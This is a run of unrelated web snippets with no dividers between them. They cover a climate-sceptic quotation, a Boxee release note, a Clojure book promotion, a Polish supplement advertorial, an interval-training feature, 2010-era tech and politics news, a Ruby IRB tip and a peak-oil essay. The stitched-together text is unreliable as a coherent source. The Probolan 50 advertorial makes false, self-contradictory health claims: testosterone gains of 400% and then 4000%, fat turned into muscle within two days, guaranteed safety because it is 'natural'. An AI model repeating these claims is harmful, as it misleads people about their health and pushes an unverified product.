" Persico and Meyer report that " gaps in the beaver - pond deposit record from 2200 - 1800 and 700 - 1000 cal yr BP are contemporaneous with increased charcoal accumulation rates in Yellowstone lakes and peaks in fire - related debris - flow activity , inferred to reflect severe drought and warmer temperatures ( Meyer et al. , 1995 ) . "
In addition , they note that " the lack of evidence for beaver activity 700 - 1000 cal yr BP is concurrent with the Medieval Climatic Anomaly , a time of widespread multi-decadal droughts and high climatic variability in Yellowstone National Park ( Meyer et al. , 1995 ) and the western USA ( Cook et al. , 2004 ; Stine , 1998 ; Whitlock et al. , 2003 ) , " while we note that the lack of evidence for beaver activity 2200 - 1800 cal yr BP is concurrent with the Roman Warm Period ...
Once again , these findings suggest there is nothing unusual , unnatural or unprecedented about the degree of warmth and drought of the Current Warm Period , in contrast to what climate alarmists continually claim . "
I 'm more freaked out by what I just read on Slashdot :
[ hardware.slashdot.org ]
It may be a little knee - jerky , but a scary thought nonetheless .
We may have just popped the biggest zit on the Earth 's face , and after the blood stops we may get one of those gigantic , solid puss chunks as a followup .
Boxee has just released next version of the Boxee Beta , which now includes :
• File Identification Progress ( shows how many files Boxee is scanning , has identified , and does n’t recognize within the media collection )
• Manual Movie & TV
Show identification ( you can now tell Boxee what ’s in your collection and / or change incorrectly labelled files )
• Facebook & Twitter in your Boxee feed ( recommendations from friends on Facebook & Twitter can now be seen within Boxee )
• New & Improved RSS Management ( a brand new way to manage , discover and play RSS feeds in Boxee )
• hundreds of bugs fixes .
Find the latest version of Boxee here .
Source : Boxee
Un besoin ?
Faire appel à nos services confère une multitude d’avantages indéniables , vous obtiendrez rapidement les résultats escomptés et vous gagnerez d’autant plus de temps .
Si vous avez des demandes ou des besoins spécifiques , il vous est toujours possible d’en faire part à notre équipe .
Cette dernière vous communiquera sans plus attendre les meilleures stratégies et astuces à mettre en place .
En faisant appel à nos services , vous avez tout simplement la garantie que l’on soit à votre écoute et que l’on tienne compte de vos demandes .
Book Promotion : The Joy of Clojure
RubyLearning is pleased to announce the promotion of the book “ The Joy of Clojure ” by author Michael Fogus and Chris Houser .
The general idea of a book promotion is that it gives the participants a chance to ask relevant questions , interact with the author of the book and in the process possibly win a copy of the book , all for free !
Here are the details :
Promotion Period : 25 to 27 May 2010 .
Michael Fogus will be online in the forum to answer your questions .
. Michael Fogus will be online in the forum to answer your questions .
Registrations have started .
Anyone interested in Clojure programming can join .
It is FREE .
Join here and use Enrollment key : BPCE101 .
. Join and use Enrollment key : .
You can start posting your questions related to the book , immediately .
Remember : Do n’t wait !
You could win a copy of this book and it ’s free to join .
The previous book promotions were a big success .
Acknowledgements
Special thanks to :
Michaelsmore .
Fogus
Manning Publications Co. for sponsoring three ebook winners ( participants asking the best questions ) and for offering a 35 % discount for any version of The Joy of Clojure ( print book + MEAP or ebook + MEAP ) to the participants .
For questions related to this blog post or to schedule a new book promotion , contact : satish.talim [ at ] gmail [ dot ] com
4.6 / 5 ( 25 votes )
Probolan jest znanym na całym świecie suplementem testosteronu , który twierdzi , że może poprawić poziom testosteronu nawet o 400 % w ciągu zaledwie 48 godzin .
Tak , to prawda , że może on zwiększyć poziom testosteronu nawet o 4000 % .
Twierdzi również , że pomoże to w budowaniu mięśni w ciągu kilku dni .
Probolan 50 jest dobrze znany również do poprawy nastroju , a także zwiększenia siły .
To surrealistyczne , że suplement doustny może dać tak wiele w tak krótkim czasie .
Co to jest Probolan 50 ?
Probolan 50 jest nowym dodatkiem w mieście , który powstaje z Polski .
Probolan został wprowadzony w branży kulturystycznej około trzech lat temu .
Firma twierdzi , że wytwarza produkt całkowicie naturalny , budujący masę i siłę mięśniową organizmu .
Wiadomo również , że znacznie zwiększa on wydajność seksualną .
Firma twierdzi również , że nie ma potrzeby , frustruj ąco długo , można szybko uzyskać wyniki .
Możesz uzupełnić produkt w swojej codziennej rutynie , uderzając w siłownię , a następnie zobaczysz , że w ciągu dwóch dni , będziesz miał zwiększone mięśnie , wytrzymałość i zainteresowanie seksualne .
Będziesz miał odnowiony poziom energii , a także będzie świeże i zupełnie nowe .
W ciągu zaledwie dwóch dni cały tłuszcz , który posiadasz zostanie przekształcony w mięśnie i w związku z tym będzie wyglądać lepiej .
Jakie są składniki Probolan 50 ?
Pierwszą rzeczą , którą należy wiedzieć jest to , że producent nie ujawnia całej swojej tajemnicy , ponieważ jest to jego tajemnica handlowa .
Nie znajdziesz listę składników na stronie internetowej , ani żadnej z ich publikacji marketingowych .
Firmy są przekonane , że składniki , których używają , nie zostaną znalezione przez innych , a zatem jeśli kupisz Probolan 50 właśnie teraz , będziesz musiał kupić produkt tylko na podstawie zaufania do marki .
Możesz polegać tylko na recenzjach i opiniach pozostawionych przez użytkowników Probolana 50 , ale rzecz w tym , że działa on inaczej w zale żności od użytkownika .
Epihydroksetioallocholan-17 -jeden lub znany również jako Epiandrosteron jest jednym z głównych składników , które poprawiają testosteron i estradiol , który ma wiele właściwości anabolicznych .
Probolan 50 pomaga zwiększy ć poziom tlenku azotu , który jest niezbędny w syntezie testosteronu .
Gdy poziom testosteronu w organizmie jest już wysoki , będzie on dawał sygnały do organizmu , aby zainicjował on wzrost mięśni .
Jakie są korzyści płynące z zastosowania Probolan 50 ?
Wspomaga on wzrost mięśni
Pomaga w przekształceniu tłuszczu w anabolizm mięśniowy .
Pomaga w poprawie wytrzymałości .
Daje dużo większą wytrzymałość , aby przetrwać intensywne nawroty treningu .
Pomaga w stonowaniu wszystkich mięśni .
Pomaga w elastyczności poprzez odmłodzenie włókien mięśniowych
Harmonizacja poziomu hormonów pomoże w nadaniu impulsu psychicznego .
Najlepsze jest to , że kombinacja składników sprawia , że produkt jest wypróbowany i przetestowany , a co za tym idzie , otrzymasz wyniki tak samo , jak osoby , które zostawiły pozytywne opinie .
Jakie są skutki uboczne Probolan 50 ?
Mówi się , że Probolan 50 jest w 100 % bezpieczny , ponieważ jest w pełni naturalny i całkowicie organiczny .
Ziołowe pochodzenie czyni go o wiele bardziej niezawodnym .
Studia i intensywne badania wykazały , że nie ma negatywnego wpływu na stosowanie Probolanu 50 przez długi okres czasu .
Tysiące butelek zostało sprzedanych , a ludzie nie zgłaszali żadnych skutków ubocznych .
Można przejrzeć formy wzrostu mięśni u konsumentów i przekonać się , że nie zgłoszono żadnych poważnych skutków ubocznych .
Dwie kapsułki będące konsumentem a może by ć niepokojące i może myśleć jak zagrożenie dla zdrowia , ale stosowanie leku poprawi wytrzymałość i będzie powodować wzrost mięśni .
Jeśli masz jakieś komplikacje medyczne , takie jak zaburzenia serca lub nerek w przeszłości , to najlepiej skonsultować się z lekarzem przed spożyciem Probolan .
Spożywanie alkoholu w trakcie stosowania leku Probolan 50 jest ogólnie uważane za bezpieczne , ponieważ jest on w 100 % naturalny , ale na ogół nie jest zalecane .
Jak działa Probolan 50 ?
Probolan 50 wykorzystuje unikalną strategię , która będzie ukierunkowana na mikroelementy i cząsteczki prekursorów w celu stymulacji mięśni , a tym samym pomoże w przyczynianiu się do anabolizmu .
Większość suplementów zwiększających masę mięśniową to kupa proszku o smaku , który nie jest tak funkcjonalny jak Probolan 50 .
Ci masażyści mogą również potrzebować szkodliwych sterydów i syntetycznych anabolitów , które z czasem będą szkodliwe dla użytkownika .
Probonal 50 jest bezpiecznym produktem , który jest całkowicie niezawodny .
Jego działanie polega na dostosowaniu odpowiednich miejsc do uwalniania hormonu testosteronu i w ten sposób pomaga w uzyskaniu większej masy mięśniowej .
Po aktywacji tego hormonu i zwiększeniu jego produkcji w zdrowiu , w ciągu kilku następnych dni następuje automatyczne stonowanie i wzrost mięśni .
Innym aktywnym składnikiem jest to , że uzupełnia on gromadzenie większej ilości ATP , a tym samym pomaga w zwiększeniu wytrzymałości i wytrzymałości .
W ten sposób nie biorą pośredniego udziału w anabolizmie mięśni , ale pomaga organizmowi i poziom w bezpiecznej produkcji tego hormonu , a tym samym prowadzi do wszystkich jego korzyści .
Jak używać Probolan 50 ?
Produkt jest wykonany w formie kapsułki , dzięki czemu jest łatwy w użyciu i obsłudze .
Są one dostarczane w butelce po 60 sztuk .
W związku z tym suplementy przyjmuje się dwa razy dziennie , jedną pigułkę we wczesnych godzinach porannych , a następną wieczorem przed głównym posiłkiem .
Probolan 50 musi by ć spożywany z dużą ilością wody w celu rozprowadzenia kapsułki i jej zawartości do odpowiednich przedziałów ciała .
Uzyskanie pożądanych rezultatów trwa około 5 do 10 tygodni i jest to zalecany okres .
Producenci sugerują , że produkt musi by ć używany przez okres 6 miesięcy , aby uzyskać najbardziej optymalne rezultaty .
Może pojawić się tendencja do zużywania większej ilości tabletek w celu uzyskania szybszych rezultatów , ale nie jest to zalecane , ponieważ może to zaburzy ć równowagę poziomu hormonów , co może mieć negatywne skutki .
Czy spożycie Probolanu 50 jest bezpieczne ?
Główny składnik ma czysto organiczny charakter .
Ponieważ jest to wszystko naturalne , jest mniej prawdopodobne , że będ ą one miały negatywny wpływ na użytkownika .
Produkt został przygotowany po latach badań i studiów i dlatego można mu zaufać .
Produkt został wypróbowany i przetestowany przez wielu użytkowników , a tysiące użytkowników użyło go i wydało pozytywne opinie .
Dostaniesz pozytywne wyniki ?
Jest to całkowicie indywidualne podejście .
Inaczej jest na podstawie genetyki i metabolizmu .
Tak więc , poziom wzrostu mięśni jest różny .
Działanie leku pomoże w uzupełnieniu wzrostu właściwej przemiany materii w celu pobudzenia wzrostu mięśni .
Zatem tak , Probolan 50 przyniesie rezultaty , jeśli będzie stosowany zgodnie z zaleceniami .
Gdzie kupić Probolan 50 , i ile to kosztuje ?
Najlepiej kupić produkt z oficjalnej strony internetowej : www.probolan50official.com.
Kup trzy i dostaniesz trzy za darmo – 147,00 $ .
Kup 2 i 1 za darmo – 129,00 USD
Kup 1 – 65,00 USD
Probolan 50 Recenzje
Probolan 50 jest produktem , który dzięki swojej skuteczności zyskał wiele uwagi .
Produkt ten ma 87 % wskaźnik zadowolenia klienta po ogólnym trendzie w kraju .
Klienci twierdzą , że produkt jest znany ze swojej skuteczności , stosunku jakości do ceny i natychmiastowego działania , a także z łatwości składania zamówień .
W dziedzinie kulturystyki Probolan 50 jest jednym z najlepszych produktów na forach kulturystycznych i jest jednym z liderów rynku .
Jeden z klientów powiedział , że przyczynił się do uzyskania 170 lbs tylko przez ogólną dietę i stosowanie Probolan 50 .
Teraz mówi , że jest na 200 lbs czystych mięśni i wytrzymałość wszystko dzięki mocy Probolan .
Ostateczny werdykt
Produkt ten jest bardzo przydatny , jeśli chcesz uzyskać masę mięśniową poprzez innowacyjne rozwiązanie .
Głównym trybem jest wzrost testosteronu , że lek przynosi i dlatego jest jednym z najlepszych na forum budowy ciała .
Najlepiej jest dokonać zakupu produktu z oficjalnego sklepu internetowego , aby uniknąć podróbek i podróbek .
Opinie o produkcie pokazują , że jest on skuteczny i działa bardzo dobrze dla wszystkich rodzajów ludzi .
Pomaga w konwersji tłuszczu w organizmie do masy mięśniowej znacznie szybciej niż inne konwencjonalne sposoby zdobywania mięśni .
Istnieje wiele ofert wiązanych , co sprawia , że produkt jest okazyjny w stosunku do tego , za co się płaci .
Our attorneys have the experience , knowledge and skills to manage even the most complex cases .
We consider all available options — including negotiation , mediation and litigation — with the goal of achieving the best possible outcome in your case .
J.A. Abels , 66 , is a financial planner by day .
But when he's not working , Abels is a serious Masters track competitor .
In fact , he 's a national champion , winner of the 2009 indoor 400 - meter run in the 65 - 69 age group .
He ran that 400 - meter race in 65.72 seconds .
He attributes that victory to one thing : interval training .
" There 's no doubt in my mind that interval training is what got me the national championship , " the Papillion , Neb. , runner said .
Intervals — a training technique that incorporates running at race speed for short , predetermined distances followed by slower - paced intervals — can benefit older runners , whether they 're competing in Masters events or just jogging in neighborhood fun runs .
Pete Magill , 48 , the 2009 USA Masters 5 K national champion in the 45 - 49 age group and a running coach who lives in South Pasadena , Calif . , touts the benefits .
" It 's inconceivable to me that anyone would attempt to run a good race without ( interval training ) . "
What is interval training ?
Interval training teaches your body to go faster .
" The only way to get faster is to run faster , " said Ross Dunton , 77 , a Masters competitor and coach , who lives in Sevierville , Tenn .
With intervals , however , you start running faster in small chunks , in manageable stretches of distance .
If your goal is to run a 5 K in about 25 minutes — or at about an 8 - minute per mile pace — a typical interval training distance would be 400 meters run in about 120 seconds .
This effort would be followed by a 200 - meter interval run at a much slower pace .
The jog is then followed by another 400 - meter run at about 120 seconds .
You would continue in this manner until running 12 of the 400 - meter stints at race pace .
Overall , including the 200 - meter jogging intervals , you 'll cover a 7 K .
Gradually , you can build up to running longer intervals at race pace , with shorter jogging intervals .
How it works
Physiologically , the increased speed helps build the body on a cellular level .
The increased effort builds new blood vessels and creates new and more muscle cells .
Chris Crowley and Henry S. Lodge explain how the process works in their book " Younger Next Year " :
" When you exercise fairly hard , you stress your muscles …
You wear out little bits that need to be replaced after each use , requiring lots of fine tuning and minor repairs .
This type of injury is called adaptive micro-trauma , and it 's critical to your growth and health .
It 's the signal to your body that it needs to repair the damage — and then some .
It needs to make the muscle just a little stronger . "
Recovering
Intervals are hard work and require recovery time , so coaches recommend doing one long - distance , aerobic - focused interval workout a week .
Magill said runners can add another weekly interval workout using much shorter distances , such as 40 meters or 100 meters .
This kind of drill is classified under " speedwork " and is an anaerobic workout .
Magill cautions runners to start interval training slowly to avoid injury .
" A lot of people start out way too hard , " he said .
To get started , Magill suggests adding 15 - to 20 - second segments of faster - paced running during regular jogs .
After a few weeks , build up to true interval training .
But again , Magill cautions against overdoing it .
" When you finish your intervals , if you do n't feel like you can run another interval at that pace , you ran too hard , " he says .
Michael Deck , 41 , is coached by Magill and swears by interval training .
Deck decided to complete a marathon four years ago , after not having run for about 20 years .
After struggling to the finish line in about four hours , Deck decided to change his training .
He altered his regimen and improved his next marathon , qualifying for the 2009 Boston Marathon .
After that experience , he wanted to go even faster .
He found Magill and his interval training .
Within about five months , Deck said , his training had him on pace to run a sub - three - hour marathon .
" It was phenomenal , " he said of the training .
Abels also remains a true believer in interval training , which he started in 2007 under Dunton .
Abels had started running again in his early 60s .
The last time he ran was during competition in high school .
He had some early success after returning to the track , winning an age - group race in the Cornhusker State Games in 2005 , but he was plagued with injuries .
He traveled to Tennessee to train with Dunton .
The coach changed Abel 's stride , but , more important , he introduced a new approach to intervals .
The changes almost eliminated injuries , and in about five weeks , he got faster .
" I went from 2:40 to 2:30 in the 800 meters , " Abels said , " and that 's a huge difference in a race like that . "
Enough to move from an also - ran to the podium .
sunday@tribune.com
A 10 - week interval progression for a 5 k
Coach Pete Magill offers a sample interval training program for a 5 K race below .
Here 's how to implement the program .
First , pick a reasonable goal for the race .
For example , if you 'd like to finish in about 25 minutes , your goal will be about an 8 - minute mile pace .
For training , your " race pace " would be 1 minute for each 200 - meter distance .
Week 1 : 12 x 400 meters at race pace , with 400 - meter jog rest
Week 2 : 12 x 400 meters at race pace , with 300 - meter jog rest
Week 3 : 12 x 400 meters at race pace , with 200 - meter jog rest
Week 4 : 6 x 800 meters at race pace , with 400 - meter jog rest
Week 5 : 12 x 400 meters at race pace , with 100 - meter jog rest
Week 6 : 6 x 800 meters at race pace , with 200 - meter jog rest
Week 7 : 12 x 400 meters at race pace , with 100 - meter jog rest
Week 8 : 5 x 1000 meters at race pace , with 400 - meter jog rest
Week 9 : 12 x 400 meters at race pace , with 100 - meter jog rest
Week 10 : Race
Google will make a strong pitch to enterprise programmers at its I/O developer conference Wednesday with the unveiling of a business version of its App Engine application hosting service and with new cloud portability initiatives in partnership with VMware .
With the announcements , Google hopes to tap into what it sees as rising demand from enterprises to create and host custom - built applications in a cloud architecture to have more deployment flexibility and reduce infrastructure management costs and complexity .
" What we hear loud and clear from medium and large enterprise customers is wanting that cloud platform to build their own applications on , " said Matthew Glotzbach , Google Enterprise director of product management .
Google launched App Engine two years ago primarily for developers of consumer - oriented Web applications who wanted to host their software on the Google cloud infrastructure .
While businesses liked the App Engine concept , many felt the product lacked some key enterprise features required by IT departments , so Google is now filling those gaps with this new version , said David Glazer , a Google engineering director .
For example , App Engine for Business has a central IT administration console designed to manage all of an organization 's applications , as well as a 99.9 percent uptime service - level guarantee and technical support .
App Engine for Business also lets IT administrators set security policies for accessing the organization 's applications , and features a pricing scheme of US $ 8 per user per month , up to a $ 1,000 monthly maximum .
The product is currently available to a limited number of customers , but Google hopes to broaden access to it later this year .
Later , Google will let developers host SQL databases in App Engine for Business , offering another option to the Google Big Table data store , and add SSL to protect application communications .
Through a partnership with VMware , Google is working to provide enterprises that use App Engine with portability capacity , so that they can deploy their applications in a variety of Java - compatible settings , whether in App Engine itself , VMware - based private or partner clouds or another hosted application platform service such as Amazon 's EC2 .
" App Engine for Business is making the cloud a friendlier place for enterprises to deploy the applications they build , bringing the benefits of the cloud to IT organizations , " Glazer said .
" By working with VMware and by building on standards for how applications run in the cloud , we 're able to bring cloud portability to those enterprises , " Glazer added .
The collaboration includes integration of the VMware Spring Roo rapid application development tool with the Google Web Toolkit , as well as linking the VMware Spring Insight performance tracker with Google 's Speed Tracer technology .
" It 's the beginnings of platform - as - a - service offerings that might interest the enterprise because of the portability and because it's from large , credible players , " said Forrester analyst Frank Gillett .
" Google still has some hurdles to clear with many enterprises about their comfort level with a bunch of things , but this announcement broadens the availability and appeal of platform - as - a - service and gives people who prefer to code in Java , as opposed to Microsoft .
Net Framework , an alternative , " Gillett said .
Gov. Tim Pawlenty said Wednesday that he would veto a bill aimed at giving same - sex partners the same end - of - life rights as married couples , saying the bill was unnecessary and would “ stoke up a political controversy on a hot - button issue . ”
Supporters balked at the governor ’s rationale , saying his suggestion that same - sex couples could achieve the same rights through a will still leaves gays on unequal footing with their heterosexual counterparts — married couples have those rights without a will .
“ He ’s wrong , ” asserted Rep. Erin Murphy , DFL - St. Paul , a House sponsor of the bill .
The bill is the product of Project 515 , an advocacy group for gays and lesbians named after the number of Minnesota laws the group says discriminate against same - sex couples .
The group is not pursuing marriage rights for same - sex couples .
Project 515 got its first bill passed last year , which protected the homes of the surviving partner of a cohabitating couple should the state try to force a sale to cover the deceased ’s medical bills .
Pawlenty signed it .
The new bill gives same - sex partners the right to make decisions about how to dispose of a deceased partner ’s body — something gay couples say is needed because some gays and lesbians are estranged from their immediate families .
The bill passed the House and Senate this week and also gives surviving partners the right to sue those responsible should their partner be killed .
Senate sponsor Yvonne Prettner Solon , a Duluth DFLer , said wills not only cost money to draw up , but can be problematic because of errors or omissions .
She also said the governor ’s rationale does not cover the right to file wrongful death suits .
“ I think he ’s missing the point , though , that this is really an issue of fairness and equality , ” Prettner Solon said .
Should the governor veto the bill , Prettner Solon said an override was unlikely .
“ I would hope that we could appeal to the governor ’s sense of compassion and fairness , ” she said .
The Associated Press contributed to this report .
Jason Hoppin can be reached at 651-228-5445 .
IRB is great for trying out one liners , but if you need to sketch longer blocks of ruby , it soon falls down .
In his Utility Belt gem , Giles Bowkett has collected a grab - bag of tricks and techniques for IRB , the highlight of which is the ability to interactively edit code in your text editor .
The Utility Belt gem has n’t been updated in a little while , but the interactive editor has continued to evolve , thanks to Jan Berkel and with help from Charles Nutter .
Installation
Install the interactive editor gem by running this at the command line :
gem install interactive_editor
Create an ~/.irbrc file if you do n’t already have one , then paste the following into it :
require ' rubygems ' require ' interactive_editor '
Note that the utility belt gem also includes an interactive editor , but it is currently out of date .
If you require both interactive_editor and utility_belt gems in your .irbrc file , there may be some conflict between them .
Vim : restore cursor position and highlight syntax
To get the most from this technique , you will want to ensure that you have enabled filetype detection and syntax highlighting in Vim .
Additionally , it is helpful to have Vim restore the cursor position to where you left it .
The following snippet of Vimscript takes care of these .
if has ( " autocmd " ) " Enable filetype detection filetype plugin indent on " Restore cursor position autocmd BufReadPost * \ if line ( " ' \ " " ) > 1 && line ( " ' \ " " ) <= line ( " $ " ) | \ exe " normal ! g`\ " " | \ endif endif if &t_Co > 2 || has ( " gui_running " ) " Enable syntax highlighting syntax on endif
Note that the example vimrc file that comes with Vim includes all of the above , so do n’t paste this into your vimrc without first checking if you already have this functionality .
WASHINGTON ( MarketWatch ) --
Senate lawmakers on Thursday approved the most significant increase in the regulation of U.S. banks since the Great Depression , placing new restrictions on the nation 's biggest banks , reining in the Federal Reserve and crafting a major new consumer - protection division for mortgage and credit - card products .
The mammoth legislative package -- which passed 59 to 39 , with three Republicans voting for the bill -- requires " too - big - to - fail " banks to install new capital restrictions and divest their derivatives units , sets up a government board to assign credit raters for banks ' structured finance securities , and instructs the government to conduct an unprecedented , one - time audit of the Fed 's emergency response programs .
Sens. Scott Brown , R - Mass. , Olympia Snowe , R- Maine , Susan Collins , R- Maine , and Charles Grassley , R - Iowa were the three Republicans voting for the bill , while two Democrats -- Sens. Russ Feingold , D - Wis. , and Maria Cantwell , D - Wash . -- voted against it .
Two Democrats did not vote - Arlen Specter of Pennsylvania and Robert Byrd of West Virginia .
A bill approved by the House in December now must be reconciled with the Senate bill .
Both contain similar and different features than the Senate bill .
Read about House bill .
Congressional leaders expect a final bill to be approved by Congress and sent to President Obama for approval before July 4 .
" Today 's bipartisan vote follows many months of hard work , " said Treasury Secretary Timothy Geithner .
" The House and Senate have now each passed strong bills that protect consumers , limit risk - taking by large institutions , and address the problem of ' too - big - to - fail . ' "
Some things in common
Both bills would subsume the Office of Thrift Supervision within the Office of the Comptroller of the Currency and create a council of regulators that would set capital standards for big banks and monitor systemic risk .
The House and Senate bills both create a system to dismantle a failing Lehman - like megabank so that its collapse does n't unsettle the markets - however , each chamber covers the costs of doing so in different ways .
The House would collect fees from big banks to create a $ 150 billion fund to liquidate a failing super - institution , while the Senate is seeking to use taxpayer dollars -- possibly trillions of dollars -- for the measure that would be ostensibly recouped from the financial industry afterwards .
The Senate bill also requires congressional approval before the Federal Deposit Insurance Corp. could provide debt guarantees in the event of a crisis , while the House permits debt guarantees .
Both bills seek to impose a major new regulatory regime to bring a huge swath of the $ 450 trillion derivatives market into the open .
Proponents of the new oversight have blamed credit default swaps , a controversial insurance derivative product , as central to the financial crisis , in part because the interconnected nature of the CDS securities required a $ 190 billion taxpayer bailout of one of their major vendors , American International Group Inc. AIG , +0.87 %
Based on both bills , a large swath of derivatives transactions made by big banks , hedge funds and other groups would be required to go through transparent clearinghouses , which are intermediaries between buyers and sellers of swaps , and put their contracts through exchanges or swap - execution facilities .
Both the House and Senate would exempt many commercial end -users of derivatives , such as airlines and manufacturers , from the clearinghouse requirement .
The House would also exempt pension funds and many hedge - fund investors that are hedging balance - sheet risk , as well as the $ 60 trillion foreign - exchange market .
The Senate bill gives the Treasury Department the authority to reject new Commodity Futures Trading Commission rules for the foreign - exchange market .
That could amount to the equivalent of exemptions , since the Treasury supports exempting the category .
The Senate bill also includes controversial provisions making it easier for investors to nominate a minority slate of directors onto corporate boards using corporate proxy cards .
Democrats believe that if shareholders had a greater say in the makeup of corporate boards and the compensation of company directors and executives , banks might have packaged fewer toxic mortgages , and the crisis might have been averted .
However , Republicans argue they empower labor unions and environmentalist investor groups in behind - the - scenes conversations at the expense of shareholder value .
A Consumer Financial Protection Bureau within the Federal Reserve would be created by the Senate bill , a similar entity to a free - standing agency proposed by the House bill .
The consumer entities would supervise and regulate mortgage and credit - card products including payday lenders and others that have so far escaped regulation .
However , both bills would exempt banks with less than $ 10 billion in assets from on - site exams by the consumer regulator .
Volcker Rule ?
The Senate legislation includes a provision that would instruct bank regulators to study limiting the speculative activity of big banks and would follow the recommendations made by the agencies ' report .
The proposed limit is dubbed the " Volcker Rule " after former Fed Chairman Paul Volcker , who chairs President Barack Obama 's economic advisory panel .
It would seek to prohibit big banks from making speculative investments in stocks , bonds and derivatives , limit their growth , and force big banks to divest hedge fund and private equity units .
Adobe intends to sue Apple over the recent SDK change that bans iPhone and iPad applications translated from languages Steve Jobs does n't like , according to a report citing sources close to Adobe .
IT World reports that Adobe will sue Apple " within a few weeks , " after the Jobsian cult not only barred native Flash from the iPhone and iPad , but also put the kibosh on Flash apps repackaged for use with Apple 's APIs .
Last week , Apple introduced an SDK for the upcoming iPhone OS 4.0 , and unlike previous kits it forbids developers from tapping Apple 's APIs through an intermediary layer that translates code not officially supported by the platform .
" Applications must be originally written in Objective -C , C , C++ , or JavaScript as executed by the iPhone OS WebKit engine , and only code written in C , C++ , and Objective - C may compile and directly link against the Documented APIs ( e.g. , Applications that link to Documented APIs through an intermediary translation or compatibility layer or tool are prohibited ) , " reads the new iPhone 4.0 SDK , released just days before Adobe announced its Flash Professional CS5 development suite , which includes a tool for repackaging Flash scripts for the iPhone .
The iPhone OS 4.0 is due to arrive on Jobsian handsets this summer , and according to IT World , the SDK change was the " last straw " in the long - running battle between Jobs and Flash .
Famously , in barring native Flash from the iPhone and the iPad , Steve Jobs called it " buggy , " littered with security holes , and a " CPU hog . "
Officially , Adobe is n't really commenting .
Last week , the company told us it was looking into the matter .
And today , a spokesman declined to comment on reports of an upcoming lawsuit .
Yes , it 's completely unclear on what basis Adobe allegedly intends to sue .
But whatever the company 's official stance , Adobe platform evangelist Lee Brimelow made his feelings quite clear last last week when he told Apple to " Go screw yourself . "
" What they are saying is that they wo n’t allow applications onto their marketplace solely because of what language was originally used to create them , " Brimelow wrote on his personal blog .
" This is a frightening move that has no rational defense other than wanting tyrannical control over developers and more importantly , wanting to use developers as pawns in their crusade against Adobe .
" I am positive that there are a large number of Apple employees that strongly disagree with this latest move .
Any real developer would not in good conscience be able to support this . " ®
Would You Use an Over - the - Counter Genetic Test ?
" World News " wants to know what you think .
Tell us below .
May 11 , 2010  -- Pathway Genomics , a San Diego company , has announced that beginning Friday , shoppers at most of Walgreens ' 7,500 stores across the U.S. can buy an over - the - counter genetic test .
The test would scan their genes for the possibility that they 'll develop such conditions as Alzheimer 's disease , breast cancer or diabetes .
Pathway Genomics also says the test can be used to forecast what genetic disorders future children might have , and weigh the likelihood that they 'll become obese or go blind .
The test consists of a salvia collection kit , and costs between $ 20 and $ 30 .
The saliva sample is sent back to Pathway Genomics labs , and from there , users can log on to Pathway 's website for a series of services that range form pregnancy planning to testing for health conditions .
Critics of the test have already emerged , and say putting genetic testing into untrained hands could lead to unnecessary testing and missed diagnoses .
" Genetic testing is a complex , difficult and emotionally laden medical process , which requires extensive counseling , contextualization and interpretation , " said Dr. Michael A. Grodin , professor of bioethics , human rights , family medicine and psychiatry at Boston University Schools of Medicine and Public Health .
Our question for you today : Would You Use an Over - the - Counter Genetic Test ?
In many ways , people who say we have lots of oil are correct .
All one has to do is include the oil which is extremely expensive and slow to extract .
Much of the cheap , easy - to - extract oil has already been removed .
There is a huge amount of oil which theoretically can be extracted .
The question is n't whether it is there -- the question is whether the cost to extract the oil will be cheap enough for us to be able to afford the oil .
If oil is too expensive , the high prices seem to cause a recession , similar to what we recently have been experiencing .
This post is an adaptation of one posted in December 2009 , relating to a talk given at that time .
A PDF of the talk can be found here .
Economic theory talks about oil prices rising , and substitutes being found , which will tend to bring prices back down .
When oil prices rose , we found substitutes , but they were poor substitutes -- generally more expensive , and hard to scale up .
Corn ethanol requires huge land use and imported fertilizers .
Wind is n't a transportation fuel -- it is a substitute for natural gas and coal in electricity production .
Making sufficient electric cars and trucks to replace our current fleet would be a huge expensive project , requiring many years , at best .
In the above slide , I purposely exaggerated the impact of an oil price rise on food and gasoline .
The effect would be greatest on a low income individual .
It would also be very great , if the price rise were to something like $ 400 barrel .
This is pretty obvious , if you think about it .
Does it sound like anything we have run into in the last few years ?
Many people think of the effects of peak oil as a future event .
But we are really experiencing them here and now .
Oil production stopped rising in 2005 , so by 2006 , we were feeling the effects of the squeeze .
The effects were being felt as early as 2004 , when oil prices began to rise .
The US was the earliest place where drilling for oil , and the earliest place where production began to decline , in spite of technological improvements and increased drilling .
But fortunately , when oil begin declining in 1970 there were other places that were not too hard to reach .
After the US 48 states production began to decline , production was ramped up in a number of places , including Alaska , shown here .
It production began to decline only a few years later .
The North Sea was another place where production was ramped up after US production began to decline .
It too began to decline rather quickly .
I did n't show Mexico , but it was another nearby location that was ramped up , but then began to decline , after US 48 states production began to decline .
At this point , most of the fields that are in easy to access locations are in decline , and we are " stuck " with what is left -- the slow to extract , expensive oil from difficult locations .
Deep water oil is one of the kinds of oil we have left , but it is expensive to extract , and , as we have just seen , if there are oil spills , they can be very difficult to stop .
So many people have equated high prices with oil shortages , that people have come to believe that if prices are low ( or at least relatively low , compared to recent past prices ) , everything is OK .
But we really need lots of quite inexpensive oil to fuel the economy , or it goes into a recession .
Reduced credit reduces demand , and has the effect of bringing oil prices down .
In the above slide , the cutback in credit is especially important .
Without credit , many people cannot buy new cars , new houses , or expensive Christmas presents .
All of these use oil in their manufacture and distribution , and keep oil prices up .
US consumer credit ( including things like credit card loans and auto loans ) peaked the same month as oil prices .
Mortgage loans peaked about the same time , and many types of commercial credit have been affected .
The government has tried to pick up the slack with additional borrowing , but this is not the same .
The EIA indicates that on a constant dollar basis , energy expenditures more than doubled between 1990 and 2008 .
Going forward , the EIA sees more increases in energy expenditures , on an inflation adjusted basis .
I might mention that one of the major uses of new technology is to bring down prices .
There are limits to what can be done -- if oil is very deep in the ocean , it is likely never going to be cheap to extract .
The need for new technology to bring down prices is probably as great or greater with fossil fuels as it is with things like wind , solar , and biofuels .
Fossil fuels are at least well adapted to running our current infrastructure .
Anything that is very different will require huge expenditures for conversion .
In my view , the big question is how debt ( and financial institutions holding the debt ) will fare .
The front page story on today 's Atlanta Journal Constitution is " Troubled banks find it hard to stay afloat " .
How long will bailing out failing banks with printed money work ?
The growing gap is the concern .
Regardless of whether oil production remains flat , or declines fairly steeply , we have a major problem .
With many people from around the world interested in using oil products , and many new cars in places like China and India , the gap between production and what we would normally consume ( if prices were low and credit were available ) is likely to continue to grow , even if somehow oil production could be kept flat .
If we intentionally decrease deep water drilling , it will tend to make the gap worse .
The advanced economies have in the recent past been able to " offshore " their energy intensive industries to places like China , giving the illusion that countries can get along with only non-energy intensive services like finance .
